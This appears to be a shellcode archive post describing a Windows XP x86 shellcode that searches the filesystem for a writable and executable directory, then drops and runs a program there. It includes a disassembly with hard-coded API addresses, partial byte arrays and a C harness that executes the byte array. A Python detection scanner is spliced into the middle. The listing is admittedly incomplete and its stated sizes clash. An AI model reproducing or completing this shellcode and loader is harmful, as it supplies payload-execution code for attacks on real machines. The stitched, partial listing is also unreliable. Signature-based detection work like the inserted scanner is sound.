Windows x86 Executable Directory Search Shellcode

A 130-byte Windows x86 shellcode that searches the filesystem for a directory it can both write to and execute from, then drops and runs a program there.

MD5 | 7c4e5860d4dfd099344ee01588f58fa2

# Title: Windows x86 - Executable directory search Shellcode (130 bytes)
# Date: 26-02-2017
# Author: Krzysztof Przybylski
# Platform: Win_x86
# Tested on: WinXP SP1
# Shellcode Size: 130 bytes

Writable and executable directory searcher
Starts the search from C:\
If a writable and executable dir is found: write, execute (ping) and exit
If a writable but non-executable dir is found: continue searching

Tested on WinXP SP1 (hard-coded API addresses: 77e6fd35 = exec, 77e798fd = exit)
i686-w64-mingw32-gcc shell.c -o golddgger.exe

Null-free version:

(gdb) disassemble
Dump of assembler code for function function:
=> 0x08048062 <+0>: pop ecx
0x08048063 <+1>: xor eax,eax
0x08048065 <+3>: mov BYTE PTR [ecx+0x64],al
0x08048068 <+6>: push eax
0x08048069 <+7>: push ecx
0x0804806a <+8>: mov eax,0x77e6fd35
0x0804806f <+13>: call eax
0x08048071 <+15>: xor eax,eax
0x08048073 <+17>: push eax
0x08048074 <+18>: mov eax,0x77e798fd
0x08048079 <+23>: call eax
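As an added detection-side example (not part of the original post or its shellcode): a Python scanner that builds byte signatures from the two hard-coded `mov eax, imm32; call eax` sequences in the disassembly above, plus the `C:\` and `172.1.1.1` strings from the byte listing, and runs them over a buffer. The sample buffer is constructed from the disassembly offsets +6..+23 and is not the full shellcode.

```python
import re

# Hard-coded API addresses the page's disassembly reaches via "mov eax, imm32; call eax".
# The page labels them only as "exec" and "exit" (WinXP SP1: 77e6fd35 / 77e798fd); because they
# are build-specific, a signature built from them is exact but brittle across Windows versions.
HARDCODED_CALLS = {"exec": 0x77E6FD35, "exit": 0x77E798FD}

def mov_eax_call_eax(addr: int) -> bytes:
    """Encode `mov eax, imm32` (B8 + 4 little-endian bytes) followed by `call eax` (FF D0)."""
    return b"\xb8" + addr.to_bytes(4, "little") + b"\xff\xd0"

def build_signatures() -> dict:
    """Byte patterns taken from the listing: the two call sequences and the two embedded strings."""
    sigs = {f"call_{name}": mov_eax_call_eax(a) for name, a in HARDCODED_CALLS.items()}
    sigs["drive_root"] = b"C:\\"        # 63 3A 5C, the search start
    sigs["ping_target"] = b"172.1.1.1"  # 31 37 32 2E 31 2E 31 2E 31
    return sigs

def scan(buf: bytes) -> dict:
    """Return {signature_name: [offsets]} for every signature that occurs in buf."""
    hits = {}
    for name, pat in build_signatures().items():
        offs = [m.start() for m in re.finditer(re.escape(pat), buf)]
        if offs:
            hits[name] = offs
    return hits

def looks_like_dirsearch_shellcode(buf: bytes) -> bool:
    """Verdict: both hard-coded calls present, and the exec call precedes the exit call
    as it does at +8 and +18 in the disassembly (ordering cuts down coincidental matches)."""
    h = scan(buf)
    if "call_exec" not in h or "call_exit" not in h:
        return False
    return min(h["call_exec"]) < min(h["call_exit"])

# Constructed sample (assumption: not the full 130-byte shellcode): the instruction bytes of
# disassembly offsets +6..+23, preceded by NOP padding and followed by the two strings.
SAMPLE = (
    b"\x90" * 8
    + b"\x50\x51" + mov_eax_call_eax(HARDCODED_CALLS["exec"])      # push eax; push ecx; mov/call exec
    + b"\x31\xc0\x50" + mov_eax_call_eax(HARDCODED_CALLS["exit"])  # xor eax,eax; push eax; mov/call exit
    + b"C:\\" + b"172.1.1.1"
)

if __name__ == "__main__":
    print(scan(SAMPLE), looks_like_dirsearch_shellcode(SAMPLE))
```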

NULL-free shellcode (132 bytes):

"\x35\xfd\xe6\x77" // exec
"\xfd\x98\xe7\x77" // exit
"\x63\x3a\x5c" // C:\ (search root; a bare trailing backslash would continue this comment onto the next line)
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 172.1.1.1

// NULL version (130 bytes):

char code[] =
"\x35\xfd\xe6\x77" // exec
"\xfd\x98\xe7\x77" // exit
"\x63\x3a\x5c" // C:\ (search root; a bare trailing backslash would continue this comment onto the next line)
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 172.1.1.1
/* remaining bytes of the listing are not present on this page */
;

int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) code;   // treat the byte array as a function and call it
    return func();
}
